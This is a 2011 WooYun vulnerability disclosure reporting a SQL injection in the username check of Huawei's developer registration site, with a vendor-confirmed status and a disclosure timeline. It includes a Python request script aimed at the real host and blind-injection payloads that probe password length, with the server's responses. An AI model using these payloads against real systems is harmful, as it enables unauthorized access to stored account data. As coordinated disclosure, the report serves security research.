当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02682

漏洞标题:华为智慧云存在SQL注入

相关厂商:华为技术有限公司

漏洞作者: Matrix

提交时间:2011-08-18 08:45

修复时间:2011-09-17 08:46

公开时间:2011-09-17 08:46

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-08-18: 细节已通知厂商并且等待厂商处理中
2011-08-18: 厂商已经确认,细节仅向厂商公开
2011-08-28: 细节向核心白帽子及相关领域专家公开
2011-09-07: 细节向普通白帽子公开
2011-09-17: 细节向实习白帽子公开
2011-09-17: 细节向公众公开

简要描述:

华为智慧云存在SQL注入,理论上可修改后台数据

详细说明:

http://developer.huaweidevice.com/dev_creg.php
用户名验证POST数据不严格,提交地址 /dev_creg/preg.php?ckuser=1
参考如下测试脚本:

import httplib, urllib
import sys
if len(sys.argv) < 2:
    exit(0)
headers = {
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8",
    "Referer": "http://developer.huaweidevice.com/dev_creg.php",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Requested-With": "XMLHttpRequest",
    
}
params=urllib.urlencode({
    "username": sys.argv[1],
})
conn = httplib.HTTPConnection('developer.huaweidevice.com')
conn.request("POST", "/dev_creg/preg.php?ckuser=1", params, headers)
response = conn.getresponse()
data = response.read()
try:
    print data.decode("utf-8")
except Exception:
    print dat

漏洞证明:

test.py ".a'"
返回错误信息:<b>SQL</b>: select uid from [Table]members where username='.a'' <br />
D:\>test.py ".a'or'1'='1"
{"code":0,"msg":"昵称不合法或者已存在"}
后台有简单过滤遇到空格会截断。
D:\>test.py ".a'or(length(password)=32)or'2'='1"
{"code":0,"msg":"昵称不合法或者已存在"}
D:\>test.py ".a'or(length(password)=31)or'2'='1"
{"code":1,"msg":"恭喜该名字可以注册!"}
D:\>test.py ".a'or(length(password)=33)or'2'='1"
{"code":1,"msg":"恭喜该名字可以注册!"}

修复方案:

建议做SQL过滤

版权声明:转载请注明来源 Matrix@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2011-08-18 14:01

厂商回复:

感谢业界对华为信息安全的关注,我们将尽快修复漏洞

最新状态:

暂无